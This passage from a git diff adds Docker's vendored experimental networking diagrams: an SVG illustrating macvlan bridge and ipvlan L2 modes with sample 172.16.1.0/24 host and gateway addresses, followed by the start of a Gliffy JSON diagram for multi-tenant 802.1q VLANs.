line-height="15.5px" x="24" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="28" y="42">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="42" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="46" y="42">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="53" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="57" y="42">13</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="71" y="42">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="75" y="42">24</text></g></g><g transform="matrix(1,0,0,1,427.8675323681471,193.5)"><g transform="translate(0,0)"><g transform="translate(-315,26.067047119140625) translate(-112.86753236814712,-219.56704711914062) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 468.5 240 L 432.3675323681471 198" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,342,193.49999999999997)"><g transform="translate(0,0)"><g transform="translate(-325,16.067047119140625) translate(-17,-209.5670471191406) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 346.5 240 L 387.6324676318529 197.99999999999997" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,280,185)"><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="76" height="32" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="76" height="16" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="16" y="0" width="46" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="16" y="14">Docker</text></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="16" width="76" height="16" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="16" width="50" height="14" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="16" width="50" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="14" y="30">Host</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="43" y="30"> #</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="54" y="30">2</text></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="62" y="18" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="16" width="1" height="14" fill-opacity="0"/></g></g></g><g transform="matrix(1,0,0,1,270.82345076546227,79.5019243141968)"><g transform="translate(0,0)"><g transform="translate(-70,-3.932952880859375) translate(-200.82345076546227,-75.56897143333742) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 410 174 L 275.32345076546227 84.0019243141968" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,167.32131882292583,39.0019243141968)"><g><g transform="translate(0,0) scale(2.1600318386915354,1.5512633057455518) translate(0.00001348378,-0.001498589)"><g><g><path fill="#FFFFFF" stroke="#434343" d="M 33.84 5.912 C 16.263 2.403 6.986 11.405 8.451 19.186 L 8.57 19.61 C -5.128 21.942 -1.537 38.106 5.033 38.106 L 5.679 38.085 C 4.026 45.68 20.032 53.41 28.958 49.548 L 29.531 48.92 C 32.713 55.752 44.02 56.893 55.201 57.177 C 64.89 57.425 70.546 56.658 74.702 52.411 L 75.341 52.599 C 90.852 53.845 97.915 43.133 94.526 35.442 L 95.36 35.207 C 100.648 33.808 101.258 21.602 92.187 19.797 L 92.361 19.325 C 96.299 11.385 87.011 3.896 74.124 5.303 L 73.23 4.837 C 64.003 -3.517 37.449 -2.157 34.373 6.108 L 33.84 5.912 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,356,150)"><g transform="translate(4,4) scale(1.0046296296296295,1.0104166666666667)"><g><g transform="translate(0,0) scale(1.08,0.48)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9259259259259258,2.0833333333333335)"><path fill="#000000" stroke="none" d="M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.08,0.48)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9259259259259258,2.0833333333333335)"><path fill="#cccccc" stroke="none" d="M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="matrix(1,0,0,1,366,153)"><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="89" height="42" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="89" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="61" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="61" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="33" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="14" y="12">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="18" y="12">Host</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="43" y="12">)</text></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="47" y="0" width="29" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="47" y="0" width="29" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="50" y="12">eth0</text></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="89" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="14" width="88" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="14" width="88" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="1" y="26">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="21" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="25" y="26">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="38" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="41" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="48" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="51" y="26">253</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="71" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="75" y="26">24</text></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="28" width="89" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="28" width="68" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="28" width="68" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="11" y="40">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="15" y="40">IP</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="30" y="40">Optional</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="74" y="40">)</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,81,150)"><g transform="translate(4,4) scale(1.0046296296296295,1.0104166666666667)"><g><g transform="translate(0,0) scale(1.08,0.48)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9259259259259258,2.0833333333333335)"><path fill="#000000" stroke="none" d="M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.08,0.48)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9259259259259258,2.0833333333333335)"><path fill="#cccccc" stroke="none" d="M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="matrix(1,0,0,1,91,153)"><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="89" height="42" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="89" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="61" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="61" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="33" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="33" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="14" y="12">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="18" y="12">Host</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="43" y="12">)</text></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="47" y="0" width="29" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="50" y="12">eth0</text></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="89" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="14" width="88" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="14" width="88" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="1" y="26">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="21" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="25" y="26">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="38" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="41" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="48" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="51" y="26">254</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="71" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="75" y="26">24</text></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="28" width="89" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="28" width="68" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="28" width="68" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="11" y="40">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="15" y="40">IP</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="30" y="40">Optional</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="74" y="40">)</text></g></g><g transform="matrix(1,0,0,1,226,64)"><g transform="translate(117,64) matrix(1,0,0,1,0,0) translate(-117,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="117" height="32" fill-opacity="0"/></g></g><g transform="translate(117,64) matrix(1,0,0,1,0,0) translate(-117,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="117" height="16" fill-opacity="0"/></g></g><g transform="translate(117,64) matrix(1,0,0,1,0,0) translate(-117,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="3" y="0" width="111" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="3" y="14">Network</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="58" y="14">Gateway</text></g><g transform="translate(117,64) matrix(1,0,0,1,0,0) translate(-117,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="16" width="117" height="16" fill-opacity="0"/></g></g><g transform="translate(117,64) matrix(1,0,0,1,0,0) translate(-117,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="16" y="16" width="87" height="16" fill-opacity="0"/></g></g><g transform="translate(117,64) matrix(1,0,0,1,0,0) translate(-117,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="16" y="16" width="67" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="16" y="30">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="39" y="30">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="43" y="30">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="59" y="30">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="62" y="30">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="70" y="30">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="74" y="30">1</text></g><g transform="translate(117,64) matrix(1,0,0,1,0,0) translate(-117,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="82" y="16" width="21" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="82" y="30">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="86" y="30">24</text></g></g><g transform="matrix(1,0,0,1,2,317)"><g transform="translate(1,0) matrix(1,0,0,1,0,0) translate(-1,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="538" height="36" fill-opacity="0"/></g></g><g transform="translate(1,0) matrix(1,0,0,1,0,0) translate(-1,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="538" height="18" fill-opacity="0"/></g></g><g transform="translate(1,0) matrix(1,0,0,1,0,0) translate(-1,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="0" width="536" height="17" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="1" y="15">Containers</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="83" y="15">Attached</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="151" y="15">Directly</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="209" y="15">to</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="226" y="15">Parent</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="278" y="15">Interface</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="340" y="15">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="349" y="15">No</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="374" y="15">Bridge</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="425" y="15">Used</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="462" y="15"> (</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="472" y="15">Docker0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="531" y="15">)</text></g></g><g transform="matrix(1,0,0,1,4,7)"><g transform="translate(81,0) matrix(1,0,0,1,0,0) translate(-81,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="538" height="22" fill-opacity="0"/></g></g><g transform="translate(81,0) matrix(1,0,0,1,0,0) translate(-81,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="538" height="22" fill-opacity="0"/></g></g><g transform="translate(81,0) matrix(1,0,0,1,0,0) translate(-81,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="81" y="0" width="376" height="22" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="81" y="19">Macvlan</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="166" y="19">Bridge</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="235" y="19">Mode</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="287" y="19"> &amp;</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="312" y="19">Ipvlan</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="376" y="19">L2</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="405" y="19">Mode</text></g></g></g></svg>
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy
new file mode 100644
index 0000000000..40eed17270
--- /dev/null
+++ b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy
@@ -0,0 +1 @@
+{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#ffffff","width":389,"height":213,"nodeIndex":276,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":null,"viewportType":"default","fitBB":{"min":{"x":5,"y":6.6999969482421875},"max":{"x":389,"y":212.14285409109937}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":64.0,"y":36.0,"rotation":0.0,"id":216,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#e69138","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-12.0,33.0],[84.0,33.0],[84.0,86.0],[120.0,86.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":190.0,"y":32.0,"rotation":0.0,"id":254,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#f1c232","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-142.0,16.0],[54.0,16.0],[54.0,115.0],[87.0,115.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":133.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":226,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":12,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":15.147567221510933,"y":139.96785409109907,"rotation":0